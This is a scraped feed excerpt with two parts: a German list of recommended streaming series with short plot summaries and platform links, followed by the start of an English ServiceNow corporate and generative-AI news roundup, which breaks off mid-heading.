<p>“Shōgun” aus dem Jahr 2024 ist eine epische Dramaserie, die sich mit den Intrigen, Kulturkonflikten und Machtkämpfen im feudalen Japan des 17. Jahrhunderts auseinandersetzt.</p>



<p>Im Mittelpunkt der Serie steht John Blackthorne, ein englischer Seefahrer, der in Japan Schiffbruch erleidet und in den politischen Machtkampf zwischen mehreren Daimyo (Feudalherren) verwickelt wird. Er wird zu einer wichtigen Figur für Lord Toranaga, der danach strebt, Shogun zu werden.</p>



<p>Die Serie zeigt Blackthornes Anpassung an die japanische Kultur und wie seine Anwesenheit die komplizierten Machtkämpfe in Japan beeinflusst. “Shōgun” erinnert dabei ein wenig an eine japanische Version von “Game of Thrones”.</p>



<p><strong>Genre:</strong> Drama</p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<h2 class="wp-block-heading toc">Fallout (Amazon Prime Video)</h2>



<p><img decoding="async" class="wp-image-2350595" src="https://b2c-contenthub.com/wp-content/uploads/2024/05/5_70dbef.png" alt="Fallout" loading="lazy"></p>



<p><a href="https://www.amazon.de/dp/B0CX7WS6L3" target="_blank" rel="noreferrer noopener">Streamen Sie Fallout auf Amazon Prime Video</a></p>



<p>“Fallout” basiert auf der gleichnamigen Videospiel-Reihe von den Bethesda Game Studios. Im Gegensatz zu den meisten anderen Filmen und Serien, die auf Videospielen basieren, konnte “Fallout” durchweg gute Kritiken einheimsen.</p>



<p>Die Serie erzählt eine postapokalyptische Geschichte, die in einer alternativen Zukunft spielt, in der die Welt durch einen Atomkrieg zerstört wurde. Wie die Spiele erkundet die Serie eine dystopische Welt voller Mutanten, Banditen und Überreste verlorener Technologien aus einer vergangenen Ära. Amazon würzt “Fallout” außerdem mit einer ordentlichen Portion Humor. </p>



<p><strong>Genre: </strong>Abenteuer, Komödie</p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<h2 class="wp-block-heading toc">House of the Dragon (WOW)</h2>



<p><img decoding="async" class="wp-image-2359504" src="https://b2c-contenthub.com/wp-content/uploads/2024/06/5_3b3d87.png" alt="House of the Dragon" loading="lazy"></p>



<p><a href="https://www.wowtv.de/serien/house-of-the-dragon" target="_blank" rel="noreferrer noopener">Streamen Sie House of the Dragon auf WOW</a></p>



<p>Die Fortsetzung von “Game of Thrones” ist endlich da! Oder besser gesagt, der Vorgänger. “House of the Dragon” basiert auf dem Buch “Fire and Blood” von George RR Martin, der auch der Autor der Reihe “The Lord of Ice and Fire” ist, auf der wiederum “Game of Thrones”basiert. Die Ereignisse von “House of the Dragon” beginnen etwa 300 Jahre vor “Game of Thrones”. </p>



<p>Der Schwerpunkt der Geschichte liegt auf den Targaryens, den Drachenlords und Vorfahren von Khaleesi Daenerys Stormborn. Nach einer langen Periode stabiler Herrschaft über die Sieben Königreiche beginnt der Niedergang der Targaryen-Dynastie, als König Viserys seine Tochter zur Thronfolgerin ausruft.</p>



<p>Sowohl die erste als auch die zweite Staffel der HBO-Serie ist in Deutschland über den Streaming-Dienst WOW verfügbar. </p>



<p><strong>Genre:</strong> Fantasy, Drama</p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<h2 class="wp-block-heading toc">One Piece (Netflix)</h2>



<p><img decoding="async" class="wp-image-2108482" src="https://b2c-contenthub.com/wp-content/uploads/2023/10/2-7.png" alt="One Piece Netflix" loading="lazy"></p>



<p><a href="https://www.netflix.com/title/80217863" target="_blank" rel="noreferrer noopener">One Piece auf Netflix streamen</a></p>



<p>Eine der erfolgreichsten Manga-Serien aller Zeiten wird als Live-Action-Serie adaptiert. “One Piece” folgt dem jungen Piraten Monkey D. Luffy und seiner Crew auf der Suche nach einem Schatz. Die Serie spielt in einer Fantasiewelt, in der sich Piraten und andere Mächte bekämpfen. “One Piece” scheint bei den Fans gut anzukommen. Die Serie schaffte es in 84 Ländern in die Netflix-Top10.<br><br><strong>Genre: </strong>Abenteuer</p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<h2 class="wp-block-heading toc">Sherlock (Netflix, Amazon Prime Video, Apple TV)</h2>



<p><img decoding="async" class="wp-image-2346980" src="https://b2c-contenthub.com/wp-content/uploads/2024/05/5_49d7d3.png" alt="Sherlock" loading="lazy"></p>



<ul>
<li><a href="https://www.netflix.com/title/70202589" target="_blank" rel="noreferrer noopener">Sherlock auf Netflix ansehen</a></li>



<li><a href="https://www.amazon.de/Sherlock-Staffel-1-dt-OV/dp/B00HFG2L7M" target="_blank" rel="noreferrer noopener">Sherlock auf Amazon Prime Video ansehen</a></li>



<li><a href="https://tv.apple.com/de/show/sherlock/umc.cmc.558pb9coo99m8vsy3k83lmmxv" target="_blank" rel="noreferrer noopener">Sherlock auf Apple TV+ ansehen</a></li>
</ul>



<p>“Sherlock” ist eine britische Fernsehserie, die erstmals zwischen 2010 und 2017 auf der BBC ausgestrahlt wurde. Die mittlerweile vier Staffeln sind eine moderne Umsetzung der klassischen Detektivgeschichten von Sir Arthur Conan Doyle. Die Serie spielt im modernen London und folgt Detektiv Sherlock Holmes und seinem Freund Dr. John Watson, die gemeinsam Verbrechen aufklären.</p>



<p>Jede Folge ist von einer der Originalgeschichten von Doyle inspiriert, wobei moderne Elemente und Technologien eine große Rolle bei der Detektivarbeit spielen. Die Hauptrollen spielen Benedict Cumberbatch und Martin Freeman. Die Serie ist unserer Meinung nach eine der besten Interpretationen von Sherlock Homes.</p>



<p><strong>Genre:</strong> Detektivgeschichten</p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<h2 class="wp-block-heading toc">Baby Reindeer (Netflix)</h2>



<p><img decoding="async" class="wp-image-2346976" src="https://b2c-contenthub.com/wp-content/uploads/2024/05/5_320223.png" alt="Baby Raindeer" loading="lazy"></p>



<p><a href="https://www.netflix.com/title/81219887" target="_blank" rel="noreferrer noopener">Baby Reindeer auf Netflix streamen</a></p>



<p>“Baby Reindeer” erzählt die wahre Geschichte von Autor Richard Gadd. Gadd schilderte seine Erfahrungen als Stalking-Opfer nicht nur in der Netflix-Serie, sondern brachte die Geschichte auch bereits auf die Theaterbühne.</p>



<p>Im Mittelpunkt steht die Begegnung von Gadd mit einer Frau in der Bar, in der er arbeitete. Was als scheinbar unschuldiger Flirt beginnt, entwickelt sich zu einem jahrelangen Kampf mit Belästigungen, Drohungen und Angst um seine Sicherheit. Die Serie hat viel Aufmerksamkeit erregt, nicht zuletzt, weil die Person, auf der die Rolle der Stalkerin Martha in der Serie basiert, an die Öffentlichkeit gegangen ist und sich zu ihrer Rolle “geäußert” hat. Sie hat Gadd auf Schadenersatz in Höhe von 170 Millionen US-Dollar verklagt.</p>



<p><strong>Genre:</strong> Drama</p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<h2 class="wp-block-heading toc">The Boys (Amazon Prime Video)</h2>



<p><img decoding="async" class="wp-image-2350591" src="https://b2c-contenthub.com/wp-content/uploads/2024/05/5_9fbf36.png" alt="The Boys" loading="lazy"></p>



<p><a href="http://www.amazon.de/dp/B0D542BNQZ" data-type="link" data-id="www.amazon.de/dp/B0D542BNQZ" target="_blank" rel="noreferrer noopener">Streamen Sie The Boys auf Amazon Prime Video</a></p>



<p>Superhelden sind in dieser Serie so beliebt wie Prominente, so einflussreich wie Politiker und werden verehrt wie Götter. “The Boys” ist ein satirischer Blick darauf, wie es wäre, wenn Superhelden ihre Kräfte nicht für das Gute einsetzen, sondern für eigene Zwecke missbrauchen würden. Die Serie bietet jede Menge Action, unerwartete Wendungen und perfekt besetzte Schauspieler. Alle vier Staffeln sind in Deutschland bei Amazon Prime Video in Stream verfügbar. </p>



<p><strong>Genre:</strong> Action, Drama</p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<h2 class="wp-block-heading toc">Jury Duty (Freevee)</h2>



<p><img decoding="async" class="wp-image-2349134" src="https://b2c-contenthub.com/wp-content/uploads/2024/05/5_52e87a.png" alt="Jury Duty" loading="lazy"></p>



<p><a href="https://www.amazon.de/gp/video/detail/amzn1.dv.gti.aeaa20db-5fb9-4eda-919b-50523edae038" target="_blank" rel="noreferrer noopener">Sehen Sie Jury Duty bei Freevee</a> (gratis mit Werbung)</p>



<p>“Jury Duty” ist eine Comedyserie im Dokumentarstil, die das Innenleben eines amerikanischen Geschworenenprozesses aus der Sicht eines Geschworenen zeigt. Was er nicht weiß, ist, dass der Fall fiktiv ist und alle anderen Geschworenen Schauspieler sind. Reality-TV in seiner besten Form. </p>



<p><strong>Genre: </strong>Realitysoap </p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<h2 class="wp-block-heading toc">Barry (Amazon Prime Video, WOW)</h2>



<p><img decoding="async" class="wp-image-2343891" src="https://b2c-contenthub.com/wp-content/uploads/2024/05/5_38e7b1.png" alt="Barry" loading="lazy"></p>



<ul>
<li><a href="http://www.amazon.de/Kapitel-eins-Mach-einen-Namen/dp/B0B6SZGV1Y" data-type="link" data-id="www.amazon.de/Kapitel-eins-Mach-einen-Namen/dp/B0B6SZGV1Y" target="_blank" rel="noreferrer noopener">Barry auf Amazon Prime Video ansehen</a></li>



<li><a href="http://www.wowtv.de/watch/home/asset/barry/136372/21434/seasons/1" data-type="link" data-id="www.wowtv.de/watch/home/asset/barry/136372/21434/seasons/1" target="_blank" rel="noreferrer noopener">Barry bei WOW streamen ansehen</a></li>
</ul>



<p>“Barry” ist eine schwarze Komödie aus dem Jahr 2018. Die Serie zeigt Barry Berkman, einen Auftragskiller und ehemaligen Marinesoldaten, wie er versucht, seine Vergangenheit hinter sich zu lassen und Schauspieler zu werden. “Barry” vermischt schwarzen Humor mit ernsten Themen.</p>



<p>Er kämpft mit seinen inneren Konflikten und moralischen Dilemmas, während er sich in der Schauspielwelt Hollywoods und der kriminellen Unterwelt zurechtfinden muss. Die Serie wurde für ihre einzigartige Kombination aus Genre und starker Charakterentwicklung gelobt.</p>



<p><strong>Genre: </strong>Drama, Komödie </p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<h2 class="wp-block-heading toc">Cunk on Earth (Netflix)</h2>



<p><img decoding="async" class="wp-image-2346883" src="https://b2c-contenthub.com/wp-content/uploads/2024/05/5_48f628.png" alt="Cunk on earth" loading="lazy"></p>



<p><a href="https://www.netflix.com/title/81516751" target="_blank" rel="noreferrer noopener">Cunk on Earth bei Netflix streamen </a></p>



<p>In dieser Mockumentary erklärt Philomena Cunk (Diane Morgan), wie die Welt funktioniert. Oder versucht es zumindest. Experten geben Antworten auf bizarre Fragen zur Entstehungsgeschichte der Menschheit. Urkomisch von der BBC.<br><br><strong>Genre:</strong> Mockumentary</p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<h2 class="wp-block-heading toc"><a name="The%20Last%20of%20Us"></a>The Last of Us (WOW)</h2>



<p><img decoding="async" class="wp-image-2343893" src="https://b2c-contenthub.com/wp-content/uploads/2024/05/5_26320c.png" alt="The Last of Us" loading="lazy"></p>



<p><a href="http://www.wowtv.de/watch/home/asset/the-last-of-us/150434/31172/seasons/1" data-type="link" data-id="www.wowtv.de/watch/home/asset/the-last-of-us/150434/31172/seasons/1" target="_blank" rel="noreferrer noopener">Sehen Sie The Last of Us auf WOW</a></p>



<p>Nachdem eine weltweite Pandemie die Menschheit nahezu ausgelöscht hat, begleitet ein abgehärteter Überlebender ein 14-jähriges Mädchen quer durch die USA. Sie könnte die letzte Hoffnung für die Menschheit sein. “The Last of Us” basiert auf dem gleichnamigen Action-Adventure-Spiel aus dem Jahr 2013 von Entwickler Naughty Dog. <br><br><strong>Genre:</strong> Zombie, Thriller</p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<h2 class="wp-block-heading toc"><a name="Mr%20robot"></a>Mr. Robot (Amazon Prime Video)</h2>



<p><img decoding="async" class="wp-image-2355342" src="https://b2c-contenthub.com/wp-content/uploads/2024/06/5_04d891.png" alt="Mr robot" loading="lazy"></p>



<p><a href="https://www.amazon.de/gp/video/detail/amzn1.dv.gti.a8a9f6c6-b782-7252-6035-67c3b550ca1f" target="_blank" rel="noreferrer noopener">Sehen Sie Mr Robot auf Amazon Prime Video</a></p>



<p>“Mr Robot” ist eine US-Serie, die 2015 Premiere feierte und 2019 mit Staffel 4 endete. Die Serie folgt Elliot Alderson (gespielt von Rami Malek), einem jungen Programmierer, der unter sozialen Ängsten und Depressionen leidet. Tagsüber arbeitet er in der Cybersicherheit eines Unternehmens, nachts ist er ein Hacker.</p>



<p>Elliot und eine Gruppe von Hackern wollen das globale Finanzsystem zerstören und die Welt vor Korruption zu retten. Die Gruppe wird von Mr. Robot (gespielt von Christian Slater) angeführt. Elliot findet bald heraus, dass Mr. Robot nicht der ist, der er vorgibt zu sein.</p>



<p>Eine gut geschriebene Handlung und starke schauspielerische Leistungen werden Sie während der gesamten Serie auf Trab halten.</p>



<p><strong>Genre:</strong> Thriller</p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<h2 class="wp-block-heading toc"><a name="Yellowstone"></a>Yellowstone (Amazon Prime Video, Netflix)</h2>



<p><img decoding="async" class="wp-image-2355367" src="https://b2c-contenthub.com/wp-content/uploads/2024/06/5_c460b2.png" alt="Yellowstone" loading="lazy"></p>



<ul>
<li><a href="http://www.amazon.de/gp/video/detail/amzn1.dv.gti.caba3c03-b3cf-4e87-50e4-ddef4fc08a82" data-type="link" data-id="www.amazon.de/gp/video/detail/amzn1.dv.gti.caba3c03-b3cf-4e87-50e4-ddef4fc08a82" target="_blank" rel="noreferrer noopener">Yellowstone bei Amazon Prime Video</a></li>



<li><a href="https://www.netflix.com/title/80238738" data-type="link" data-id="https://www.netflix.com/title/80238738" target="_blank" rel="noreferrer noopener">Yellowstone bei Netflix </a></li>
</ul>



<p>“Yellowstone” ist ein Western-Drama mit Kevin Costner in der Hauptrolle. Die Serie verfolgt den Konflikt zwischen einer großen Rinderfarm, einem Indianerreservat, einem Nationalpark und Menschen, die das Land bebauen wollen. Die Serie wurde für viele Preise nominiert und wurde von Kritikern hoch gelobt. Ein hochwertiges Western-Drama.</p>



<p><strong>Genre: </strong>Western, Drama</p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<h2 class="wp-block-heading toc"><a name="The%20White%20lotus"></a>The White Lotus (WOW)</h2>



<p><img decoding="async" class="wp-image-2343903" src="https://b2c-contenthub.com/wp-content/uploads/2024/05/5_6461d1.png" alt="The White Lotus" loading="lazy"></p>



<p><a href="https://www.wowtv.de/watch/home/asset/the-white-lotus/145625/27162/seasons/1" data-type="link" data-id="https://www.wowtv.de/watch/home/asset/the-white-lotus/145625/27162/seasons/1" target="_blank" rel="noreferrer noopener">Sehen Sie The White Lotus bei WOW</a></p>



<p>In einem tropischen Resort folgen wir sowohl den Gästen als auch den Angestellten während einer ereignisreichen Woche. Das ist sowohl lustig als auch unangenehm. In der ersten Staffel sind Schauspieler wie Jennifer Coolidge, Alexandra Daddario und Sydney Sweeney zu sehen.</p>



<p>In der zweiten Staffel folgen wir neuen Charakteren, in einem Urlaubsresort auf Sizilien. Darsteller wie Aubrey Plaza und Tom Hollander machen Staffel 2 noch besser als die erste.</p>



<p><strong>Genre:</strong> Drama, Komödie</p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<h2 class="wp-block-heading toc"><a name="Wednesday"></a>Wednesday (Netflix)</h2>



<p><img decoding="async" class="wp-image-2346902" src="https://b2c-contenthub.com/wp-content/uploads/2024/05/5_ccbb77.png" alt="Wednesday" loading="lazy"></p>



<p><a href="https://www.netflix.com/title/81231974" target="_blank" rel="noreferrer noopener">Wednesday auf Netflix ansehen</a></p>



<p>Wednesday Addams, aus der Addams Family, ist zurück auf Sendung. Diesmal folgen wir Wednesday während ihrer Jahre als Schülerin. Neben der Schule versucht sie auch, ihre übersinnlichen Kräfte zu beherrschen. Ebenfalls gilt es, ein Geheimnis um ihre Eltern zu lösen. </p>



<p><strong>Genre:</strong> Komödie</p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<h2 class="wp-block-heading toc"><a name="Futurama"></a>Futurama (Disney+)</h2>



<p><img decoding="async" class="wp-image-2351908" src="https://b2c-contenthub.com/wp-content/uploads/2024/05/5_6980cc.png" alt="Futurama" loading="lazy"></p>



<p><a href="https://www.disneyplus.com/de-de/series/details-wse/4B9X20Pjihaf" target="_blank" rel="noreferrer noopener">Futurama auf Disney+ ansehen</a></p>



<p>Die Zeichentrickserie stammt aus der Feder von “Simpsons”-Schöpfer Matt Groening. Hauptfigur Philip J. Fry wird versehentlich eingefroren und wacht tausend Jahre in der Zukunft auf. Er bekommt einen Job in einer Firma, die Pakete ins ganze Universum liefert. Die Serie ist intelligent, witzig und kreativ. Nicht nur für “Simpsons”-Fans ein Muss.</p>



<p><strong>Genre:</strong> Zeichentrick, Komödie</p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<h2 class="wp-block-heading toc"><a name="Devil's%20hour"></a>Die Stunde des Teufels (Amazon Prime Video)</h2>



<p><img decoding="async" class="wp-image-2349160" src="https://b2c-contenthub.com/wp-content/uploads/2024/05/5_a0586e.png" alt="The Devil's Hour" loading="lazy"></p>



<p><a href="https://www.amazon.de/gp/video/detail/amzn1.dv.gti.98366570-75e9-464c-81a7-6e90bb48bd6a" data-type="link" data-id="https://www.amazon.de/gp/video/detail/amzn1.dv.gti.98366570-75e9-464c-81a7-6e90bb48bd6a">Die Stunde des Teufels auf Prime Video ansehen</a></p>



<p>Peter Capaldi und Jessica Raine spielen die Hauptrollen in diesem fesselnden sechsteiligen Psychothriller. Lucy wacht jede Nacht um genau 3:33 Uhr auf. Seit Langem ergibt nichts mehr in ihrem Leben einen Sinn. Die Antworten sind irgendwo da draußen, am Ende einer Spur von brutalen Morden.</p>



<p><strong>Genre:</strong> Thriller</p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<h2 class="wp-block-heading toc"><a name="Yellowjackets"></a>Yellowjackets (Paramount+)</h2>



<p><img decoding="async" class="wp-image-2355358" src="https://b2c-contenthub.com/wp-content/uploads/2024/06/5_8bbc28.png" alt="Yellowjackets" loading="lazy"></p>



<p><a href="https://www.paramountplus.com/de/shows/yellowjackets/" target="_blank" rel="noreferrer noopener">Yellowjackets bei Paramount+ streamen</a></p>



<p>Eine Frauenfußballmannschaft fliegt von New Jersey nach Seattle, aber das Flugzeug stürzt in der kanadischen Wildnis ab. Dort sitzen sie in der Falle und sind gezwungen, alles zu tun, um 19 Monate lang zu überleben. Und mit alles… meinen wir wirklich alles.</p>



<p>Die Serie schildert den Kampf der Überlebenden in der Wildnis, aber auch ihr Leben danach in der Gegenwart. “Yellowjackets” wurde für mehrere Emmys nominiert.</p>



<p><strong>Genre:</strong> Thriller, Mystery</p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<h2 class="wp-block-heading toc"><a name="The%20offer"></a>The Offer (Paramount+)</h2>



<p><img decoding="async" class="wp-image-2355348" src="https://b2c-contenthub.com/wp-content/uploads/2024/06/5_6e93ee.png" alt="The Offer" loading="lazy"></p>



<p><a href="https://www.paramountplus.com/de/shows/the-offer/" target="_blank" rel="noreferrer noopener">The Offer bei Paramount+ streamen</a></p>



<p>Eine zehnteilige Miniserie, die erzählt, wie Francis Ford Coppolas Meisterwerk “Der Pate” entstand und was wirklich hinter den Kulissen geschah. Es stellt sich heraus, dass es nicht die einfachste Aufgabe war, den ersten Film über die einst geheime Mafia zu drehen. Die echte Mafia ist nicht gerade begeistert von dem Projekt.</p>



<p><strong>Genre:</strong> Biographie, Drama</p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<h2 class="wp-block-heading toc"><a name="The%20Great"></a>The Great (MGM+)</h2>



<p><img decoding="async" class="wp-image-2343878" src="https://b2c-contenthub.com/wp-content/uploads/2024/05/5_f9cf2f.png" alt="The Great" loading="lazy"></p>



<p><a href="https://www.amazon.de/gp/video/detail/amzn1.dv.gti.4bd5d0da-5d6f-4fea-818e-4fd03a622275" data-type="link" data-id="https://www.amazon.de/gp/video/detail/amzn1.dv.gti.4bd5d0da-5d6f-4fea-818e-4fd03a622275" target="_blank" rel="noreferrer noopener">The Great bei MGM+ streamen</a></p>



<p>Eine Serie über die russische Kaiserin Katharina die Große. Aber mehr als der Name ist wahrscheinlich nicht ganz historisch korrekt. Sie ist jedoch sehr gut gemacht und witzig, und die Schauspieler sind Weltklasse. Wenn Sie ein Geschichtsfan sind, empfehle ich Ihnen, Ihren Stolz herunterzuschlucken und diese köstliche Satire einfach zu genießen.</p>



<p><strong>Genre:</strong> Komödie</p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<h2 class="wp-block-heading toc"><a name="Rick%20and%20Morty"></a>Rick and Morty (Netflix, WOW)</h2>



<p><img decoding="async" class="wp-image-2343939" src="https://b2c-contenthub.com/wp-content/uploads/2024/05/5_875212.png" alt="Rick &amp; Morty" loading="lazy"></p>



<ul>
<li><a href="https://www.netflix.com/title/80014749" target="_blank" rel="noreferrer noopener">Rick and Morty bei Netflix</a></li>



<li><a href="https://www.wowtv.de/watch/home/asset/rick-and-morty/131894/17501/seasons/1" target="_blank" rel="noreferrer noopener">Rick and Morty bei WOW</a></li>
</ul>



<p>Die Erfolgsserie “Rick and Morty” ist für eine sechste Staffel zurück. Folgen Sie Morty und seinem verrückten Großvater Rick auf weitere wilde Abenteuer durchs Universum. Rick ist ein Wissenschaftler, der so ziemlich alles bauen und durch Zeit und Raum reisen kann. Jede Folge ist vollgepackt mit skurrilen Charakteren und cleverem Humor. Hier kommt keine Langeweile auf!</p>



<p><strong>Genre:</strong> Zeichentrick, Komödie</p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<h2 class="wp-block-heading toc"><a name="Peacemaker"></a>Peacemaker (RTL+)</h2>



<p><img decoding="async" class="wp-image-2343931" src="https://b2c-contenthub.com/wp-content/uploads/2024/05/5_bce4c3.png" alt="Peacemaker" loading="lazy"></p>



<p><a href="https://plus.rtl.de/video-tv/serien/peacemaker-935921/staffel-1-935922" target="_blank" rel="noreferrer noopener">Sehen Sie Peacemaker auf RTL+</a></p>



<p>In dieser Superhelden-Serie muss John Cena als Peacemaker die Welt vor Außerirdischen retten, die die Erde versteckt in menschlichen Körpern übernehmen wollen. Die TV-Serie überrascht mit Humor, Tragik und Tiefgang.   </p>



<p><strong>Genre:</strong> Action, Komödie</p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<h2 class="wp-block-heading toc"><a name="Only%20murderers%20in%20the%20building"></a>Only Murders in the Building (Disney+)</h2>



<p><img decoding="async" class="wp-image-2059934" src="https://b2c-contenthub.com/wp-content/uploads/2023/09/5-3.png" alt="Only murderers in the building" loading="lazy"></p>



<p><a href="https://www.disneyplus.com/de-de/series/details-wse/2EfP45PYWY5s" target="_blank" rel="noreferrer noopener">Sehen Sie Only Murders in the Building bei Disney+</a></p>



<p>Drei Menschen, die im selben Haus wohnen (gespielt von Steve Martin, Martin Short und Selena Gomez), teilen ein großes Interesse an True-Crime-Podcasts. Eines Tages stirbt ein Nachbar auf mysteriöse Weise und sie werden plötzlich in einen echten Kriminalfall verwickelt, den sie gemeinsam zu lösen versuchen. Eine spannende Comedy-Serie, von der mittlerweile die zweite Staffel erschienen ist.</p>



<p><strong>Genre:</strong> Komödie</p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<h2 class="wp-block-heading toc"><a name="What%20We%20Do%20In%20the%20Shadows"></a>What We Do in the Shadows (Disney+)</h2>



<p><img decoding="async" class="wp-image-2351937" src="https://b2c-contenthub.com/wp-content/uploads/2024/05/5_0acce5.png" alt="What We Do In the Shadows" loading="lazy"></p>



<p><a href="http://www.disneyplus.com/de-de/series/details-wse/40SsBvhCRbp1" data-type="link" data-id="www.disneyplus.com/de-de/series/details-wse/40SsBvhCRbp1" target="_blank" rel="noreferrer noopener">Sehen Sie What We Do in the Shadows auf Disney+</a></p>



<p>Ein Blick auf das Leben von vier Vampiren, die schon seit Jahrhunderten zusammen sind. Die Serie basiert auf dem gleichnamigen Film. Schöpfer der Serie ist Jemaine Clement, der auch für den witzigen “Flight of the Concords” verantwortlich war.</p>



<p><strong>Genre:</strong> Komödie</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[ServiceNow: Latest news and insights]]></title>
<description><![CDATA[ServiceNow is an enterprise software and workplace management orchestration vendor based in Santa Clara, Calif. Its cloud-based enterprise service management (ESM) platform, Now, helps companies automate workflows across the enterprise, including those involved in IT service management (ITSM), IT...]]></description>
<link>https://tsecurity.de/de/2248024/it-security-nachrichten/servicenow-latest-news-and-insights/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2248024/it-security-nachrichten/servicenow-latest-news-and-insights/</guid>
<pubDate>Sat, 27 Jul 2024 01:03:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>ServiceNow is an enterprise software and workplace management orchestration vendor based in Santa Clara, Calif. Its cloud-based <a href="https://www.cio.com/article/350246/10-top-enterprise-service-management-systems-and-how-to-choose.html">enterprise service management (ESM)</a> platform, Now, helps companies automate workflows across the enterprise, including those involved in <a href="https://www.cio.com/article/230741/what-is-itsm-managing-it-to-serve-business-needs.html">IT service management (ITSM)</a>, IT operations management, IT asset management, and HR service delivery, among other domains.</p>



<p>AI — <a href="https://www.infoworld.com/article/2338115/what-is-generative-ai-artificial-intelligence-that-creates.html">generative AI</a> in particular — has increasingly become a focus of late for ServiceNow, which has a market cap of $173 billion, making it the <a href="https://companiesmarketcap.com/tech/largest-tech-companies-by-market-cap/" rel="nofollow">26th largest technology vendor</a> in the world.</p>



<p>Here is the latest ServiceNow news and analysis:</p>



<h3 class="wp-block-heading">ServiceNow embroiled in DOJ probe of government contract award</h3>



<p><em>July 25, 2024:</em> ServiceNow has <a href="https://www.cio.com/article/3477586/servicenow-embroiled-in-doj-probe-of-government-contract-award.html">reported potential compliance issues</a> to the US Department of Justice “related to one of its government contracts” as well as the hiring of the then-CIO of the US Army to be its head of global public sector, the company said in regulatory filings on Wednesday. The DOJ is looking into the matter.</p>



<h3 class="wp-block-heading">ServiceNow 2Q24 results position genAI as ‘tailwind’</h3>



<p><em>July 24, 2024:</em> The cloud-based ESM vendor announced <a href="https://www.servicenow.com/company/media/press-room/second-quarter-2024-earnings.html" rel="nofollow">22% year-over-year revenue growth</a>, based on $2.54 billion in software subscriptions for the quarter, and singled out net-new account contract value (NNACV) for Now Assist, its generative AI platform, as having doubled quarter over quarter, overachieving expectations</p>



<h3 class="wp-block-heading">IDC MarketScape: ServiceNow among cloud management automation leaders</h3>



<p><em>June 12, 2024:</em> Research firm IDC has released “<a href="https://www.idc.com/research/viewtoc.jsp?containerId=US52084624">IDC MarketScape: Worldwide Multicloud and Hybrid Cloud Management with Automation 2024 Vendor Assessment</a>,” which ranks ServiceNow among its leaders. “Recent investments in generative AI and partnerships with NVIDIA will keep ServiceNow at the forefront of innovation for years to come,” IDC wrote in its report.</p>



<h3 class="wp-block-heading">IDC Market Note: Service must prove itself in ALM push</h3>



<p><em>May 31, 2024:</em> ServiceNow’s recent entry into the asset lifecycle management (ALM) market is part of an ambitious growth strategy that <a href="https://www.idc.com/getdoc.jsp?containerId=US52262624&amp;pageType=PRINTFRIENDLY">pits it against entrenched competitors</a>, notes IDC’s Brian O’Rourke. Here, the company’s genAI push could be an significant asset, but “whether that is enough to ensure success in a competitive market … remains to be seen.”</p>



<h3 class="wp-block-heading">IDC Link: ServiceNow 1Q24 results announce ‘AI platform’ era</h3>



<p><em>May 6, 2024:</em> ServiceNow’s 1Q24 earnings call introduced the term “AI platform” as a positioning statement, <a href="https://www.idc.com/getdoc.jsp?containerId=lcUS52111824">notes IDCs Stephen Elliot</a>, who sees compelling possibilities for the company and customers alike. “Early indications and discussions from Now Assist customers highlight positive cost savings and staff productivity,” he writes.</p>



<h3 class="wp-block-heading">Generative AI takes center stage in latest ServiceNow release</h3>



<p><em>March 20, 2024:</em> ServiceNow’s latest platform release, dubbed Washington DC, moves the cloud-based IT management and operations software company <a href="https://www.cio.com/article/2067653/generative-ai-takes-center-stage-in-latest-servicenow-release.html">sharply in the direction of generative AI</a>, with new features designed to help companies working with that technology.</p>



<h3 class="wp-block-heading">IDC Market Note: ServiceNow entwines partnerships with genAI development</h3>



<p><em>March 13, 2024:</em> IDC’s Snow Tempest examines ServiceNow’s latest announcements, which <a href="https://www.idc.com/getdoc.jsp?containerId=US51932624&amp;pageType=PRINTFRIENDLY">reveal an intertwined strategy</a> of generative AI development and industry partnerships aimed at targeted industries and use cases. “These partnerships offer ServiceNow a strategic adoption opportunity for organizations considering work with generative AI.”</p>



<h3 class="wp-block-heading">ServiceNow adds gen AI to more workflows, including chatbot creation</h3>



<p><em>November 16, 2023:</em> ServiceNow is rolling out <a href="https://www.cio.com/article/1247612/servicenow-adds-gen-ai-to-more-workflows-including-chatbot-creation.html">another wave of generative AI additions</a> to facilitate workflow management on its Now Platform. The update adds gen AI capabilities for field service workers, chatbot creators, and developers, among others.</p>



<h3 class="wp-block-heading">How ServiceNow gets the most out of generative AI</h3>



<p><em>November 15, 2023:</em> As the <a href="https://www.cio.com/article/1247210/how-servicenow-gets-the-most-out-of-generative-ai.html">company adopts generative AI internally</a>, ServiceNow CIO Chris Bedi is measuring everything — and thinks you should too. “One reason we’re releasing early is because we’re ready,” says Bedi. “We’ve been working on large language models for years.”</p>



<h3 class="wp-block-heading">ServiceNow boasts industry-first gen AI general availability with Vancouver release of Now</h3>



